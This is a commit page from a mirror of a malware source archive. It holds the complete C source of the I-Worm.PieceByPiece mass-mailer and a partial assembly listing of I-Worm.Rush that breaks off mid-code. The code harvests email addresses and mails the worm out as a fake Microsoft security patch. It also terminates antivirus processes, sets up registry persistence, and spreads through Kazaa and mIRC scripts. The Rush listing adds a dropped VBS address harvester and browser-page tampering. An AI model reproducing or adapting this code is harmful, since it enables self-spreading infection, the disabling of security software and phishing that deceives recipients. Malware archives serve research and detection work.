13
1
mirror of https://github.com/vxunderground/MalwareSourceCode synced 2024-06-16 03:58:34 +00:00

Add files via upload

This commit is contained in:
vxunderground 2020-10-09 22:16:57 -05:00 committed by GitHub
parent 9cbdb38457
commit 1ffdfd1526
No known key found for this signature in database
GPG Key ID: 4AEE18F83AFDEB23
85 changed files with 21199 additions and 0 deletions

878
Win32/I-Worm.PieceByPiece.c Normal file

@ -0,0 +1,878 @@
/*
I-Worm/PieceByPiece Copyright (C) 2002 MI_pirat [Red-Cell] inc.
For educational purpose only. Distribute under GPL.
Some lyrics from the song that inspired me:
"Cause nothing ever lasts forever
We're like flowers in this vase, together
You and me, it's pulling me down
Tearing my down, piece by piece
And you can't see
That's it's like a disease
Killing me now, it's so hard to breathe"
-Feeder <Piece by Piece>
*/
#include <winsock.h>
#include <fstream.h>
#include <tlhelp32.h>
#include <string.h>
#include <stdlib.h>
//--------------------------------------GLOBAL VARIABLES-------------------------------------
HWND hwnd;
WORD version = MAKEWORD(1,1);
WSADATA wsaData;
int nRet;
char Buf[256],myBuf[256],ch[1],ch2[256],server[]="smtp.barrysworld.com",email[]="john@barrysworld.com",helo[]="barrysworld.com";
char emails[50][100],windir[MAX_PATH],filename[MAX_PATH],winbkup[MAX_PATH],zippth[MAX_PATH];
char cx[1],cx2[33],buc1[8],buc2[8],buc3[8],xxx[256];
SOCKET theSocket;
int i,err=0,c=0,connected=0,tim,sending=0;
SYSTEMTIME time;
double k;
DWORD basesize,ProcessId;
//--------------------------------------WNDPROC-----------------------------------------------
LRESULT CALLBACK WndProc(HWND hWnd,UINT iMsg,WPARAM wParam,LPARAM lParam);
//--------------------------------------GETASC------------------------------------------------
int getasc(char chr[1]) {
int i=0;
char c[1];
for (i=0;i<257;i++) {
c[0]=i;
if (chr[0]==c[0]) { return(i); }
}
}
//--------------------------------------BASE64-----------------------------------------------
void base64(char *file) { //Encodes a file using the "base 64" encoding
WIN32_FIND_DATA fis; //It's kinna shitty code, but it works just GREAT!
int i,j,n,done=0,k=0,lin=0;
double c=0;
char tmp[7];
DWORD totsize;
char base[64]={'A','B','C','D','E','F','G','H','I','J','K','L','M','N','O','P',
'Q','R','S','T','U','V','W','X','Y','Z','a','b','c','d','e','f',
'g','h','i','j','k','l','m','n','o','p','q','r','s','t','u','v',
'w','x','y','z','0','1','2','3','4','5','6','7','8','9','+','/'};
fstream f(file,ios::in | ios::binary), g("C:\\Msbootlog.sys",ios::out);
FindFirstFile(file,&fis);
totsize=fis.nFileSizeLow; //Get the file size in bytes
for (c=0;c<totsize/3;c++) { //Encode 'till no more 3 char chunks are available
buc1[0]=0;
xxx[0]=0;
f.get(cx[1]);
j=getasc(&cx[1]);
itoa(j,cx2,2);
if (strlen(cx2)<8) {
for (i=0;i<8-strlen(cx2);i++) buc1[i]='0';
buc1[i]=0;
strcat(buc1,cx2);
} else strcpy(buc1,cx2);
buc2[0]=0;
f.get(cx[1]);
j=getasc(&cx[1]);
itoa(j,cx2,2);
if (strlen(cx2)<8) {
for (i=0;i<8-strlen(cx2);i++) buc2[i]='0';
buc2[i]=0;
strcat(buc2,cx2);
} else strcpy(buc2,cx2);
buc3[0]=0;
f.get(cx[1]);
j=getasc(&cx[1]);
itoa(j,cx2,2);
if (strlen(cx2)<8) {
for (i=0;i<8-strlen(cx2);i++) buc3[i]='0';
buc3[i]=0;
strcat(buc3,cx2);
} else strcpy(buc3,cx2);
xxx[0]=0;
strcpy(xxx,buc1);
done=0;
k=0;
while (done!=24) {
for (i=done;i<done+6;i++) {
tmp[k]=xxx[i];
k++;
}
tmp[k]=0;
done+=6;
n=strtol(tmp,NULL,2);
g<<base[n];
lin++;
if (lin==76) {
g<<endl;lin=0;
}
tmp[0]=0;
k=0;
}
}
//One char left so add 4 0s at the end
if (totsize%3==1) {
buc1[0]=0;
f.get(cx[1]);
j=getasc(&cx[1]);
itoa(j,cx2,2);
if (strlen(cx2)<8) {
for (i=0;i<8-strlen(cx2);i++) buc1[i]='0';
buc1[i]=0;
strcat(buc1,cx2);
} else strcpy(buc1,cx2);
strcat(buc1,"0000");
done=0;
k=0;
while (done!=12) {
for (i=done;i<done+6;i++) {
tmp[k]=buc1[i];
k++;
}
tmp[k]=0;
done+=6;
n=strtol(tmp,NULL,2);
g<<base[n];
lin++;
if (lin==76) {
g<<endl;lin=0;
}
tmp[0]=0;
k=0;
}
g<<"==";
}
//Two chars left so add 2 0s at the end
if (totsize%3==2) {
buc1[0]=0;
f.get(cx[1]);
j=getasc(&cx[1]);
itoa(j,cx2,2);
if (strlen(cx2)<8) {
for (i=0;i<8-strlen(cx2);i++) buc1[i]='0';
buc1[i]=0;
strcat(buc1,cx2);
} else strcpy(buc1,cx2);
strcat(buc1,"00");
done=0;
k=0;
while (done!=18) {
for (i=done;i<done+6;i++) {
tmp[k]=buc1[i];
k++;
}
tmp[k]=0;
done+=6;
n=strtol(tmp,NULL,2);
g<<base[n];
lin++;
if (lin==76) {
g<<endl;lin=0;
}
tmp[0]=0;
k=0;
}
g<<"=";
}
f.close();
g.close();
//Get the size of the encoded file
FindFirstFile("C:\\Msbootlog.sys",&fis);
basesize=fis.nFileSizeLow;
}
//--------------------------------------SENDMAIL---------------------------------------------
void sendmail() { //Sends an e-mail with MIME encoding
int ran;
sending=1;
//"HELO" the server
strcpy(myBuf, "HELO <");
strcat(myBuf,helo);
strcat(myBuf,">\x0d\x0a");
send(theSocket,myBuf,strlen(myBuf),0);
recv(theSocket,Buf,sizeof(Buf),0);
if (Buf[0]=='2' && Buf[1]=='5' && Buf[2]=='0') {
strcpy(myBuf, "MAIL FROM:<");
strcat(myBuf,email);
strcat(myBuf,">\x0d\x0a");
send(theSocket,myBuf,strlen(myBuf),0);
recv(theSocket,Buf,sizeof(Buf),0);
}
if (Buf[0]=='4' || Buf[0]=='5') err=1;
if (Buf[0]=='2' && Buf[1]=='5' && Buf[2]=='0' && err==0) {
GetSystemTime(&time);
srand(time.wSecond);
ran=rand();
while (ran>c) {
srand(c);
ran=ran-rand();
}
if (ran<0) ran=ran*(-1);
strcpy(myBuf, "RCPT TO:<");
strcat(myBuf, emails[ran]);
strcat(myBuf, ">\x0d\x0a");
send(theSocket,myBuf,strlen(myBuf),0);
recv(theSocket,Buf,sizeof(Buf),0);
}
if (Buf[0]=='4' || Buf[0]=='5') err=1;
if (Buf[0]=='2' && Buf[1]=='5' && err==0) {
strcpy(myBuf, "DATA\x0d\x0a");
send(theSocket,myBuf,strlen(myBuf),0);
recv(theSocket,Buf,sizeof(Buf),0);
}
if (Buf[0]=='4' || Buf[0]=='5') err=1;
if (Buf[0]=='3' && Buf[1]=='5' && Buf[2]=='4' && err==0) {
if (stricmp(email,"john@barrysworld.com")==0) { //if we use the hard-coded e-mail address
strcpy(myBuf, "Reply-To: \"Microsoft\" <microsoft@microsoft.com>\x0d\x0a");
send(theSocket,myBuf,strlen(myBuf),0);
strcpy(myBuf, "From: \"Microsoft\" <information@microsoft.com>\x0d\x0a");
send(theSocket,myBuf,strlen(myBuf),0);
strcpy(myBuf, "Subject: Internet Explorer vulnerability patch\x0d\x0a");
send(theSocket,myBuf,strlen(myBuf),0);
} else { //if we find a new address
strcpy(myBuf, "From: <");
strcat(myBuf, email);
strcat(myBuf, ">\x0d\x0a");
send(theSocket,myBuf,strlen(myBuf),0);
strcpy(myBuf, "Subject: Hello\x0d\x0a");
send(theSocket,myBuf,strlen(myBuf),0);
}
strcpy(myBuf, "MIME-Version: 1.0\x0d\x0a");
send(theSocket,myBuf,strlen(myBuf),0);
strcpy(myBuf, "Content-Type: multipart/mixed;\x0d\x0a");
send(theSocket,myBuf,strlen(myBuf),0);
strcpy(myBuf, " boundary = \"bla\"\x0d\x0a");
send(theSocket,myBuf,strlen(myBuf),0);
strcpy(myBuf, "X-Priority: 3\x0d\x0a");
send(theSocket,myBuf,strlen(myBuf),0);
strcpy(myBuf, "X -MSMail - Priority: Normal\x0d\x0a");
send(theSocket,myBuf,strlen(myBuf),0);
strcpy(myBuf, "X-Mailer: mailer@localhost\x0d\x0a\x0d\x0a");
send(theSocket,myBuf,strlen(myBuf),0);
strcpy(myBuf, "This is a multi-part message in MIME format.\x0d\x0a\x0d\x0a");
send(theSocket,myBuf,strlen(myBuf),0);
strcpy(myBuf, "--bla\x0d\x0a");
send(theSocket,myBuf,strlen(myBuf),0);
strcpy(myBuf, "Content-Type: text/plain; charset:us-ascii\x0d\x0a\x0d\x0a");
send(theSocket,myBuf,strlen(myBuf),0);
strcpy(myBuf, "You will find all you need in the attachment.\x0d\x0a\x0d\x0a");
send(theSocket,myBuf,strlen(myBuf),0);
strcpy(myBuf, "--bla\x0d\x0a");
send(theSocket,myBuf,strlen(myBuf),0);
strcpy(myBuf, "Content-Type: application/x-msdownload;\x0d\x0a");
send(theSocket,myBuf,strlen(myBuf),0);
strcpy(myBuf, " name = \"setup.exe\"\x0d\x0a");
send(theSocket,myBuf,strlen(myBuf),0);
strcpy(myBuf, "Content-Transfer-Encoding: base64\x0d\x0a");
send(theSocket,myBuf,strlen(myBuf),0);
strcpy(myBuf, "Content-Disposition: attachment;\x0d\x0a");
send(theSocket,myBuf,strlen(myBuf),0);
strcpy(myBuf, " filename = \"setup.exe\"\x0d\x0a\x0d\x0a");
send(theSocket,myBuf,strlen(myBuf),0);
//Send the file byte by byte
fstream f("C:\\Msbootlog.sys",ios::in);
for (k=0;k<basesize;k++) {
f.get(ch[1]);
strcpy(myBuf,&ch[1]);
send(theSocket,myBuf,strlen(myBuf),0);
}
f.close();
strcpy(myBuf, "\x0d\x0a--bla--\x0d\x0a");
send(theSocket,myBuf,strlen(myBuf),0);
strcpy(myBuf, "\x0d\x0a.\x0d\x0a");
send(theSocket,myBuf,strlen(myBuf),0);
recv(theSocket,Buf,sizeof(Buf),0);
}
if (Buf[0]=='4' || Buf[0]=='5') err=1;
strcpy(myBuf, "QUIT\x0d\x0a");
send(theSocket,myBuf,strlen(myBuf),0);
}
//--------------------------------------GETPROCESSMODULE------------------------------------
BOOL GetProcessModule (DWORD dwPID, DWORD dwModuleID,
LPMODULEENTRY32 lpMe32, DWORD cbMe32)
{
BOOL bRet = FALSE;
BOOL bFound = FALSE;
HANDLE hModuleSnap = NULL;
MODULEENTRY32 me32 = {0};
hModuleSnap = CreateToolhelp32Snapshot(TH32CS_SNAPMODULE, dwPID);
if (hModuleSnap == (HANDLE)-1)
return (FALSE);
me32.dwSize = sizeof(MODULEENTRY32);
if (Module32First(hModuleSnap, &me32))
{
do
{
if (me32.th32ModuleID == dwModuleID)
{
CopyMemory (lpMe32, &me32, cbMe32);
bFound = TRUE;
}
}
while (!bFound && Module32Next(hModuleSnap, &me32));
bRet = bFound;
}
else
bRet = FALSE;
CloseHandle (hModuleSnap);
return (bRet);
}
//--------------------------------------PROCESSES---------------------------------------------
BOOL processes() //Various stuff with processes
{
HANDLE hProcessSnap = NULL;
BOOL bRet = FALSE;
PROCESSENTRY32 pe32 = {0};
hProcessSnap = CreateToolhelp32Snapshot(TH32CS_SNAPPROCESS, 0);
if (hProcessSnap == (HANDLE)-1)
return (FALSE);
pe32.dwSize = sizeof(PROCESSENTRY32);
if (Process32First(hProcessSnap, &pe32))
{
DWORD dwPriorityClass;
BOOL bGotModule = FALSE;
MODULEENTRY32 me32 = {0};
do
{
bGotModule = GetProcessModule(pe32.th32ProcessID,
pe32.th32ModuleID, &me32, sizeof(MODULEENTRY32));
if (bGotModule)
{
HANDLE hProcess;
hProcess = OpenProcess (PROCESS_ALL_ACCESS,
FALSE, pe32.th32ProcessID);
dwPriorityClass = GetPriorityClass (hProcess);
//Get the virus' filename
if (me32.th32ProcessID==ProcessId) strcpy(filename,me32.szExePath);
//Anti AVs
if (strstr(me32.szModule,"AV")!=0 || strstr(me32.szModule,"F-")!=0 || strstr(me32.szModule,"av")!=0) {
TerminateProcess(hProcess,0);
}
//Close the handle
CloseHandle (hProcess);
}
}
while (Process32Next(hProcessSnap, &pe32));
bRet = TRUE;
}
else
bRet = FALSE;
CloseHandle (hProcessSnap);
return (bRet);
}
//--------------------------------------FINDSERVER--------------------------------------------
void findserver() { //Gets a SMTP server and user name from the registry (if possible)
int i,j;
char key2[256];
unsigned char acc[1024],smtp[1024],eml[1024];
DWORD acclen=sizeof(acc), smtplen=sizeof(smtp), emllen=sizeof(eml);
HKEY hKey;
//Try getting a SMTP server from registry
strcpy(key2,"Software\\Microsoft\\Internet Account Manager");
RegOpenKeyEx(HKEY_CURRENT_USER,key2,0,KEY_QUERY_VALUE,&hKey);
RegQueryValueEx(hKey,"Default Mail Account",0,NULL,acc,&acclen);
RegCloseKey(hKey);
strcpy(key2,"Software\\Microsoft\\Internet Account Manager\\Accounts\\");
j=strlen(key2);
for (i=0;i<8;i++){
key2[j+i]=acc[i];
}
key2[j+i]=0;
RegOpenKeyEx(HKEY_CURRENT_USER,key2,0,KEY_QUERY_VALUE,&hKey);
RegQueryValueEx(hKey,"SMTP Server",0,NULL,smtp,&smtplen);
RegCloseKey(hKey);
if (smtp[0]>44 && smtp[0]<123) { //if a valid serv. is found, replace the hard-coded one with
i=0; //the new one
while (smtp[i]!=0) {
server[i]=smtp[i]; //Now this is the SMTP server
i++;
}
server[i]=0;
//Get the e-mail
RegOpenKeyEx(HKEY_CURRENT_USER,key2,0,KEY_QUERY_VALUE,&hKey);
RegQueryValueEx(hKey,"SMTP Email Address",0,NULL,eml,&emllen);
RegCloseKey(hKey);
if (eml[0]>44 && eml[0]<123) { //if a valid e-mail is found, replace the hard-coded one with
i=0; //the new one
while (eml[i]!=0) {
email[i]=eml[i]; //Now this is the "FROM:" e-mail
i++;
}
email[i]=0;
}
//Set a new "HELO" domain
i=strlen(email)-1;
j=0;
while (email[i]!='@') {
helo[j]=email[i];
j++;
i--;
}
}
helo[j]=0;
strrev(helo);
//end
}
//--------------------------------------FINDMAIL----------------------------------------------
void findmail(char file[MAX_PATH]) //Gets e-mail addresses from HTML files
{
int ik,j=0;
char lin[256],*start,ch[1];
fstream f(file,ios::in);
while (f.get(lin,256))
{
start=strstr(lin,"mailto:");
if (start!=0)
{
j=0;
c++;
ik=start-lin+7;
ch[1]=lin[ik];
while (ch[1]!=34 && ch[1]!=58 && ch[1]!=32 && ch[1]!=62 && ch[1]!=63)
{
emails[c][j]=ch[1];
j++;
ik++;
ch[1]=lin[ik];
}
emails[c][j]=0;
}
f.get();
}
f.close();
}
//--------------------------------------FINDFILES---------------------------------------------
void findfiles() { //Searches for .htm files in the temp. directories
WIN32_FIND_DATA f;
HANDLE hf;
int k=0;
char pth1[MAX_PATH],pth2[MAX_PATH],pth3[MAX_PATH],pth[MAX_PATH],path[MAX_PATH];
strcpy(pth2,windir);
strcat(pth2,"\\Temporary Internet Files\\*");
hf=FindFirstFile(pth2,&f);
if (f.dwFileAttributes==FILE_ATTRIBUTE_DIRECTORY+FILE_ATTRIBUTE_SYSTEM) {strcpy(pth1,f.cFileName); k=20;}
while (FindNextFile(hf,&f)!=0 && k<20) {
if (f.dwFileAttributes==FILE_ATTRIBUTE_DIRECTORY+FILE_ATTRIBUTE_SYSTEM) {strcpy(pth1,f.cFileName); k=20;}
k++;
}
FindClose(hf);
strcpy(pth2,windir);
strcat(pth2,"\\Temporary Internet Files\\");
strcat(pth2,pth1);
strcat(pth2,"\\*");
k=0;
hf=FindFirstFile(pth2,&f);
if (f.dwFileAttributes==FILE_ATTRIBUTE_DIRECTORY+FILE_ATTRIBUTE_SYSTEM) {strcpy(pth3,f.cFileName); k=20;}
while (FindNextFile(hf,&f)!=0 && k<20) {
if (f.dwFileAttributes==FILE_ATTRIBUTE_DIRECTORY+FILE_ATTRIBUTE_SYSTEM) {strcpy(pth3,f.cFileName); k=20;}
k++;
}
FindClose(hf);
strcpy(pth2,windir);
strcat(pth2,"\\Temporary Internet Files\\");
strcat(pth2,pth1);
strcat(pth2,"\\");
strcat(pth2,pth3);
strcpy(pth,pth2);
strcat(pth,"\\");
strcat(pth2,"\\*.htm");
k=0;
hf=FindFirstFile(pth2,&f);
while (FindNextFile(hf,&f)!=0 && k<70) {
if (f.cFileName[0]!='.') {
strcpy(path,pth);
strcat(path,f.cFileName);
findmail(path);
}
k++;
}
FindClose(hf);
}
//--------------------------------------CONECT------------------------------------------------
int conect() { //Connects to a server using "Winsock"
// Start up Winsock
i=WSAStartup(version, &wsaData);
if (i!=0) {return(0);}
// Store information about the server
LPHOSTENT lpHostEntry;
lpHostEntry = gethostbyname(server);
if (lpHostEntry == NULL) {
WSACleanup();
connected=0;
return(0);
} else connected=1; //This means we're connected
//Get important data
if (err==0) { //If we didn't run this allready and got an error
findserver();
findfiles();
}
// Create the socket
theSocket = socket(AF_INET,SOCK_STREAM,IPPROTO_TCP);
if (theSocket == INVALID_SOCKET) {
WSACleanup();
connected=0;
return(0);
}
SOCKADDR_IN saServer;
saServer.sin_family = AF_INET;
saServer.sin_addr = *((LPIN_ADDR)*lpHostEntry->h_addr_list);
saServer.sin_port = htons(25);
// Connect to the server
nRet = connect(theSocket,(LPSOCKADDR)&saServer,sizeof(struct sockaddr));
if (nRet == SOCKET_ERROR) {
WSACleanup();
connected=0;
return(0);
}
nRet = recv(theSocket,Buf,sizeof(Buf),0);
if (nRet == SOCKET_ERROR) {
WSACleanup();
connected=0;
return(0);
}
if (Buf[0]=='4' || Buf[0]=='5') err=1;
if (Buf[0]=='2' && Buf[1]=='2' && Buf[2]=='0') {
sendmail();
}
//Close the connection
closesocket(theSocket);
// Shutdown Winsock
WSACleanup();
}
//--------------------------------------KAZAA-----------------------------------------------
void kazaa(char *file) { //Makes a copy in the Kazaa "Shared Folder"
int i;
char kaza[256],kfile[3][20];
unsigned char kpth[1024];
DWORD kpthlen=sizeof(kpth);
HKEY hKey;
//The filenames
strcpy(kfile[0],"\\mirc6.exe");
strcpy(kfile[1],"\\winamp3.exe");
strcpy(kfile[2],"\\wincrack.exe");
strcpy(kfile[3],"\\icq2002.exe");
//Get the path to Kazaa from the reg.
RegOpenKeyEx(HKEY_CURRENT_USER,"Software\\Kazaa\\Transfer",0,KEY_QUERY_VALUE,&hKey);
RegQueryValueEx(hKey,"DlDir0",0,NULL,kpth,&kpthlen);
RegCloseKey(hKey);
if (kpth[0]>64 && kpth[0]<123) {
i=0;
while (kpth[i]!=0) {
kaza[i]=kpth[i];
i++;
}
kaza[i]=0;
}
GetSystemTime(&time);
srand(time.wSecond);
if (rand()%5==0) strcat(kaza,kfile[3]);
else if (rand()%4==0) strcat(kaza,kfile[2]);
else if (rand()%3==0) strcat(kaza,kfile[1]);
else if (rand()%2==0) strcat(kaza,kfile[0]);
CopyFile(file,kaza,FALSE);
}
//--------------------------------------INFECTWIN-------------------------------------------
void infectwin(char *file) { //Makes copies of the worm in %WinDir%\System\winsys*.exe
HKEY hKey;
unsigned char val[256];
char rnd[6];
int i=0;
strcpy(winbkup,windir);
strcat(winbkup,"\\System\\winsys");
GetSystemTime(&time);
srand(time.wSecond);
itoa(rand(),rnd,10);
strcat(winbkup,rnd);
strcat(winbkup,".exe");
//Copy file to Windows
CopyFile(file,winbkup,TRUE);
//Just in case there is no WinZip, use this path
strcpy(zippth,winbkup);
//Now make Windows run it at startup
while (winbkup[i]!=0) {
val[i]=winbkup[i];
i++;
}
val[i]=0;
RegCreateKey(HKEY_CURRENT_USER,"Software\\Microsoft\\Windows\\CurrentVersion\\Run",&hKey);
RegSetValueEx(hKey,"Windows task32 sys",0,REG_SZ,val,sizeof(val));
RegCloseKey(hKey);
}
//--------------------------------------MIRC--------------------------------------------------
void mirc() { //Creates a mIRC script
HKEY hKey;
unsigned char mircpth[1024];
char mirc[MAX_PATH];
int i=0;
DWORD mircpthlen=sizeof(mircpth);
//Get the path from our friend: the registry :)
RegOpenKeyEx(HKEY_LOCAL_MACHINE,"Software\\Microsoft\\Windows\\CurrentVersion\\Uninstall\\mIRC",0,KEY_QUERY_VALUE,&hKey);
RegQueryValueEx(hKey,"UninstallString",0,NULL,mircpth,&mircpthlen);
RegCloseKey(hKey);
i=1;
while (mircpth[i]!=0 && mircpth[i]!='.') {
mirc[i-1]=mircpth[i];
i++;
}
mirc[i-1]=0;
i=strlen(mirc);
while (mirc[i]!=92) {
mirc[i]=0;
i--;
}
strcat(mirc,"script.ini");
//Write a new script.ini
fstream f(mirc,ios::out);
f<<"[Script]"<<endl;
f<<"n0=ON 1:JOIN:#:{"<<endl;
f<<"n1=/dcc send $nick "<<zippth<<endl;
f<<"n2=}"<<endl;
f<<"n3=on 1:start:{"<<endl;
f<<"n4= /join #piecebypiece"<<endl;
f<<"n5=}"<<endl;
f.close();
}
//--------------------------------------ZIPIT-------------------------------------------------
void zipit(char *file) { //Zips the virus with a random name
HKEY hKey;
unsigned char zip[1024];
char zippath[MAX_PATH],param[MAX_PATH],rnd[6];
int i=0;
DWORD ziplen=sizeof(zip);
//Get the path from the registry
i=RegOpenKeyEx(HKEY_LOCAL_MACHINE,"Software\\Microsoft\\Windows\\CurrentVersion\\App Paths\\winzip32.exe",0,KEY_QUERY_VALUE,&hKey);
if (i==ERROR_SUCCESS) { //If WinZip is installed then zip the file
RegQueryValueEx(hKey,"",0,NULL,zip,&ziplen);
RegCloseKey(hKey);
i=0;
while (zip[i]!=0) {
zippath[i]=zip[i];
i++;
}
zippath[i]=0;
//Make a random filename for the .zip file
strcpy(zippth,windir);
strcat(zippth,"\\System\\win32sys");
GetSystemTime(&time);
srand(time.wSecond);
itoa(rand(),rnd,10);
strcat(zippth,rnd);
strcat(zippth,".zip");
//Zip it!
strcpy(param," -a -r ");
strcat(param,zippth);
strcat(param," ");
strcat(param,file);
ShellExecute(hwnd,"open",zippath,param,NULL,SW_HIDE);
} else strcpy(zippth,file); //Else just use the executable file for mIRC
}
//--------------------------------------TIMERPROC---------------------------------------------
VOID CALLBACK TimerProc(HWND hwnd,UINT uMsg,UINT idEvent,DWORD dwTime) {
if (sending==0) { //Check for a connection if a mail is not under delivery
conect();
if (err!=0) { //if the server used encountered an error, try using the hard-coded serv.
strcpy(server,"smtp.barrysworld.com");
strcpy(email,"john@barrysworld.com");
strcpy(helo,"barrysworld.com");
conect();
}
if (connected==1) KillTimer(hwnd,tim); //Don't need to check for it again, but keep resident
}
}
//--------------------------------------PAYLOAD-----------------------------------------------
void payload() { //Every virus MUST have a payload ;)
MessageBox(NULL,"\"Cause nothing ever lasts forever\nWe're like flowers in this vase, together\nYou and me, it's pulling me down\nTearing my down, piece by piece\nAnd you can't see\nThat's it's like a disease\nKilling me now, it's so hard to breathe\"\n\t-Feeder <Piece by Piece>","I-Worm/PiecebyPiece",MB_OK+MB_SYSTEMMODAL);
}
//--------------------------------------------------------------------------------------------
//Main function
//--------------------------------------------------------------------------------------------
int WINAPI WinMain(HINSTANCE hInstance,HINSTANCE hPrevInst,LPSTR lpCmdLine,int nShowCmd){
WNDCLASSEX wndc;
MSG msg;
HKEY hKey;
unsigned char buf[1024],inf[]="yes";
DWORD buflen=sizeof(buf);
int first=0;
//Create a window
wndc.cbClsExtra = 0;
wndc.cbSize = sizeof(wndc);
wndc.cbWndExtra = 0;
wndc.hbrBackground = (HBRUSH)GetStockObject(BLACK_BRUSH);
wndc.hCursor = LoadCursor(NULL,IDC_ARROW);
wndc.hIcon = LoadIcon(NULL,IDI_APPLICATION);
wndc.hIconSm = LoadIcon(NULL,IDI_APPLICATION);
wndc.hInstance = hInstance;
wndc.lpfnWndProc = WndProc;
wndc.lpszClassName = "ClassName";
wndc.lpszMenuName = NULL;
wndc.style = CS_HREDRAW|CS_VREDRAW;
RegisterClassEx(&wndc);
hwnd =CreateWindow("ClassName","NEWWIN",WS_POPUPWINDOW,0,0,1024,1024,NULL,NULL,hInstance,NULL);
UpdateWindow(hwnd);
//Hide the window
ShowWindow(hwnd,SW_HIDE);
//Get the filename and disable (if possible) any AVs
GetWindowThreadProcessId(hwnd,&ProcessId);
processes();
GetWindowsDirectory (windir, sizeof (windir)); //Get the Windir
//Check if the comp. was infected before
RegOpenKeyEx(HKEY_LOCAL_MACHINE,"Software\\RedCell",0,KEY_QUERY_VALUE,&hKey);
RegQueryValueEx(hKey,"infected",0,NULL,buf,&buflen);
RegCloseKey(hKey);
if (buf[0]!='y' || buf[1]!='e' || buf[2]!='s')
{
RegCreateKey(HKEY_LOCAL_MACHINE,"Software\\RedCell",&hKey);
//Create a key in the registry to mark the PC as infected
RegSetValueEx(hKey,"infected",0,REG_SZ,inf,sizeof(inf));
RegCloseKey(hKey);
//----INFECT COMPUTER----
infectwin(filename);
kazaa(filename);
zipit(winbkup);
mirc();
base64(filename);
conect();
first=1;
MessageBox(hwnd,"This program has performed an illegal operation","Error",MB_OK+MB_ICONSTOP);
}
base64(filename);
GetSystemTime(&time);
if (time.wDay==15 && time.wMonth==9) payload(); //Activate payload when school starts (15 sept. in Romania)
if (first==0) {
base64(filename); //Write a "base64" encoded file every time (just in case)
conect(); //Try to connect
if (err!=0) { //If the server found in the reg. got an error, try using the hard-coded serv.
strcpy(server,"smtp.barrysworld.com");
strcpy(email,"john@barrysworld.com");
strcpy(helo,"barrysworld.com");
conect();
}
}
if (connected==0) SetTimer(hwnd,tim,50000,TimerProc); //Go resident and check for a connection every 50 secs.
while(GetMessage(&msg,NULL,0,0)) { //Stuff... ;-)
TranslateMessage(&msg);
DispatchMessage(&msg);
}
return msg.wParam;
//end of main()
}
//--------------------------------------WNDPROC----------------------------------------------
LRESULT CALLBACK WndProc(HWND hwnd,UINT iMsg,WPARAM wParam,LPARAM lParam) {
HDC hdc;
PAINTSTRUCT ps;
switch(iMsg){
case WM_PAINT:
hdc = BeginPaint(hwnd,&ps);
EndPaint(hwnd,&ps);
return 0;
case WM_DESTROY:
PostQuitMessage(0);
return 0;
}
return DefWindowProc(hwnd,iMsg,wParam,lParam);
}
//That's all folks! e-mail to: MI_pirat@yahoo.com , web:

BIN
Win32/I-Worm.Pilif.7z Normal file

Binary file not shown.

498
Win32/I-Worm.Rush.asm Normal file

@ -0,0 +1,498 @@
comment #
Name : I-Worm.Rush
Author : PetiK
Date : August 27th - September 2nd
Size : 5632 byte (compiled with UPX tool)
Action : Copy itself to
* WINDOWS\SYSTEM\Mail32.exe
Add in the key HKLM\Software\Microsoft\Windows\CurrentVersion\Run the value
* Mail Outlook = WINDOWS\SYSTEM\Mail32.exe
* On Wednesday it opens the cdrom
* The 3rd it produces a sound
* the 15th it alters "Search Page", "Start Page", and "Local Page" by
* Creates %personal%\Read_Me.txt with a text
* A vbs file search all email in the Oultook software and put them in the Mailbook.txt.
The worm scans the file to find email.
Subject : New Scan Virus...
Body : Hi man,
I send you the last update of ScanVir (v 2.5).
Look at the file attached.
Bye and have a nice day.
Attached : ScanVir_25.exe
* Scans title of windows :
- Norton AntiVirus => Norton Virus : W32.Norton.Worm@mm
- System Properties => Minimize the window
To build the worm:
@echo off
tasm32 /ml /m9 Rush
tlink32 -Tpe -c -x -aa Rush,,,import32,dllz
upx -9 Rush.exe
if exist *.obj del *.obj
if exist *.map del *.map
To delete the worm:
del %windir%\system\Mail32.exe
del %personal%\Read_Me.txt
del %windir%\MailBook.txt
#
.586p
.model flat
.code
JUMPS
callx macro a
extrn a:proc
call a
endm
include useful.inc
include myinclude.inc
start:
;call hide_worm
twin_worm:
push 50
mov esi,offset orig_worm
push esi
push 0
callx GetModuleFileNameA
mov edi,offset copy_worm
push edi
push 50
push edi
callx GetSystemDirectoryA
add edi,eax
mov eax,"iaM\"
stosd
mov eax,".23l"
stosd
mov eax,"exe"
stosd
pop edi
push 0
push edi
push esi
callx CopyFileA
push 8
push edi
push 1
@pushsz "Mail Outlook"
@pushsz "Software\Microsoft\Windows\CurrentVersion\Run"
push 80000002h
callx SHSetValueA
check_date:
push offset SystemTime
callx GetSystemTime
cmp [SystemTime.wDayOfWeek],03h
jne beep1
cdrom_open:
push 00h
push 00h
push 00h
@pushsz "open cdaudio"
callx mciSendStringA
push 00h
push 00h
push 00h
@pushsz "set cdaudio door open"
callx mciSendStringA
beep1: push offset SystemTime
callx GetSystemTime
cmp [SystemTime.wDay],03h
jne special_folder
mov counter,0
beep2: inc counter
push 30h
callx MessageBeep
push 1
callx Sleep
cmp counter,5000
jne beep2
special_folder:
push 00h
push 05h
push offset personal
push 00h
callx SHGetSpecialFolderPathA
@pushsz "\Read_Me.txt"
push offset personal
callx lstrcat
txt_file:
push 00h
push 01h
push 02h
push 00h
push 01h
push 40000000h
push offset personal
callx CreateFileA
mov [FileHdl],eax
push 00h
push offset octets
push TXTSIZE
push offset txtd
push [FileHdl]
callx WriteFile
push [FileHdl]
callx CloseHandle
vbs_file:
pushad
push 00h
push 80h
push 02h
push 00h
push 01h
push 40000000h
@pushsz "C:\rushhour.vbs"
callx CreateFileA
xchg edi,eax
push 00h
push offset octets
push VBSSIZE
push offset vbsd
push edi
callx WriteFile
push edi
callx CloseHandle
popad
push 1
@pushsz "wscript C:\rushhour.vbs"
callx WinExec
push 2000
callx Sleep
@pushsz "C:\rushhour.vbs"
callx DeleteFileA
push offset SystemTime
callx GetSystemTime
cmp [SystemTime.wDay],0Fh
jne start_scan
call internet_page
start_scan:
mov edi,offset mailbook
push edi
push 50
push edi
callx GetWindowsDirectoryA
add edi,eax
mov eax,"iaM\"
stosd
mov eax,"ooBl"
stosd
mov eax,"xt.k"
stosd
mov ax,"t"
stosd
xor eax,eax
stosd
open_scan_file:
pushad
push 00h
push 80h
push 03h
push 00h
push 01h
push 80000000h
push offset mailbook
callx CreateFileA
inc eax
je not_exist
dec eax
xchg eax,ebx
xor eax,eax
push eax
push eax
push eax
push 2
push eax
push ebx
callx CreateFileMappingA
test eax,eax
je F1
xchg eax,ebp
xor eax,eax
push eax
push eax
push eax
push 4
push ebp
callx MapViewOfFile
